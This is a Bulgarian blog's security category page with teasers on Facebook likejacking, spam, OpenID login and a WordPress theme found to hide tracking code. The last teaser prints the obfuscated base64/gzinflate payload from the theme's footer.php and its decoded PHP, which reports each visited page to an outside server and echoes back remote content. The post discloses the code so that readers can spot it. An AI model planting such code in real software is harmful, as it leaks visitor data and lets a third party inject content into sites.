Статии от категория ‘Сигурност’

Официално изявление на Георги Стефанов
Публикувано в (Сигурност) от Георги Стефанов на 30 септември 2011 в 17:22
Във връзка с мой видеорепортаж по bTV със заглавие Фейсбук контрольори,   вчера 29 септември 2011 г. в Интернет бяха публикувани много статии с подвеждащи и объркани заглавия, които бяха много далеч от истината. Статиите бяха заляти с негативни и дори заплашителни коментари. Не знам дали тези подвеждащи статии са пуснати нарочно, с цел да се засилва напрежението или просто някои журналисти отново не са разбрали какво се случва. С моето официално становище ще се опитам да внеса малко яснота:   На първо място напълно подкрепям мирните протести срещу "цар Киро" и всеки друг подобен мутренски феодал, независимо от неговия етнос. Болно и обидно ще ми стане, ако "цар Киро" получи само 6 години затвор - заслужава много повече! Бих подкрепил всяка Facebook група, която призовава за законно и справедливо наказание, например "Смъртно наказание за… прочети цялата статия»
(3) коментара    Текст на статия


Измами във Facebook
Публикувано в (Сигурност) от Георги Стефанов на 24 август 2011 в 21:52

Скрито харесване на фен страници

От месеци във  Facebook се създават все повече фен страници, които имат една единствена цел да трупат колкото се може повече фенове, като ползват скрита техника, която те прави фен на страницата без да разбереш (Likejacking). Също така е възможно да станеш фен на съвсем друга страница във Facebook, която дори не си виждал. Понякога ставаш фен не на една, а на няколко фен страници.

Как го правят?

Създават нова фен страница. Измислят скандално заглавие свързано с известна личност. Примерите са много: "Голи снимки на Диляна Попова от "Стъклен дом" (16+)",  "Андреа, Николета и Златка... страшно видео | Видео",  "Гонзовица пуска голи новини (снимки)",  "Андреа заголи гръд пред Калин Врачански (Видео)
прочети цялата статия»
(11) коментара    Текст на статия


Блокиране на спам през cPanel
Публикувано в (Сигурност) от Георги Стефанов на 3 юли 2010 в 21:36

Какво е СПАМ?

За мен СПАМ е всяко едно неочаквано имейл съобщение, дори запитване дали може да ми пратят непоискано съобщение :) Напоследък върлува следния досаден СПАМ със заглавие: "Въпрос от Бизнес Каталог България" и текст: Уважаеми Дами и Господа, Бихме желали да поискаме разрешение да ви изпратим непоискано търговско съобщение. Темата му е "Каталог Медия и Реклама 2010" Ако искате да го прочетете, можете да посетите този линк ... Ако не желаете да получавате повече полезна информация от нас, можете да запишете Вашият мейл тук ... С уважение, Бизнес Каталог България 02 421 40 44 www.cаtаlogbg.biz office@cаtаlogbg.biz office@bаzi-dаnni.com Това съобщение се получава по няколко пъти в една пощенска кутия. На пръв поглед това е съвсем културно съобщение, но искам да ти обърна внимание, че подобна опция при която се записваш, че не желаеш да получаваш имейли е много опасна! Това е сигурен начин… прочети цялата статия»
(2) коментара    Текст на статия


Логване в сайт с OpenID през Google
Публикувано в (Сигурност, Уеб програмиране) от Георги Стефанов на 28 януари 2010 в 16:08

Ограничен достъп и логване с OpenID

Някой от страниците на сайта ganbox.com реших да са достъпни само след логване, затова ми се наложи да си направя логин форма, през която потребителите да се логват и да получават достъп. Обикновено една такава система включва в себе си няколко функции: страница за регистриране, страница за логване, страница за забравена парола, страница за промяна на парола или други лични данни, управление на сесии, база данни с данни за потребителите. Мислих няколко варианта и накрая реших, че без последните две няма как да мина, но нямам време да правя другите страници. Затова избрах решение с OpenID логване.

Какво е OpenID?

Съвсем накратко: с една парола достъп до много сайтове. Това е метод, който обединява протокол и системи, който ти дава възможност да се регистрираш в един… прочети цялата статия»
(2) коментара    Текст на статия


Код за шпиониране в WordPress
Публикувано в (Сигурност, Уеб програмиране) от gan на 16 август 2009 в 15:52

Код за проследяване

Пиша тази статия за всички ползващи Wordpress, които не обичат да ги следят без тяхно знание. Проблем: Безплатна тема за Wordpress с име Red_wave от автор AskGraphics се разпространява свободно на сайта http://wordpresstemplates.name, но открих, че съдържа във файла footer.php следния обфускиран PHP код: <? eval(gzinflate(base64_decode('vZHRasIwFIavV/AdQpCSglSvJ7INV3Aw0NV2N2MESU9tZpZTkuiE6bsvOrsibre7/c+ X/3xJwBg03ECNxkm9ZINoGHTHWECePpIRoZVz9XW/r6ReFShWscD3vkDtQLu4ruobWYzCCq0b0XhtFGjhj7Iunyfpc5 K+0EmWzfhkOs/oaxTTcG3kH2CaPOXJPON5+uDRYdAJZEkYk9ptFootwXFRLvlmYRhdKIUf3JfwEmvQNIrIbkdOpNS Se/o3KiJhSMq1Fk6i5rCV1llGS6mAHub2UPfZ+d4ApEheT2Ysya14mGnWBPQFn4R9NGrnvS8V90VDyzOqmodSM0h5p4 HPji35xUPBWrl1S+f6f+HzHMbbgsPYDUfXI2E+ms4xPkrv7JO2RQYvBFsQBahOh0EIT7b8A'))); ?> (Всичко това е на един ред). Което всъщност представлява следния зашифрован PHP код за проследяване: error_reporting(0); $CodeURL = "http://linkdock.com/content.php?id=&host=".urlencode($_SERVER["HTTP_HOST"]) ."&uri=".urlencode($_SERVER["REQUEST_URI"]); if ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file_get_contents")) { echo @file_get_contents($CodeURL); } elseif ((intval(get_cfg_var("allow_url_fopen")) || intval(ini_get("allow_url_fopen"))) && function_exists("file")) { $content = @file($CodeURL); echo @join("", $content); } elseif (function_exists("curl_init")) { $ch = curl_init($CodeURL); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); } Както се вижда този скрипт изпраща до сървъра linkdock.com не само името на вашия домейн, а и точната страница, която в момента отваря посетителя.

Защо го правят?

С този код получават… прочети цялата статия»
(8) коментара    Текст на статия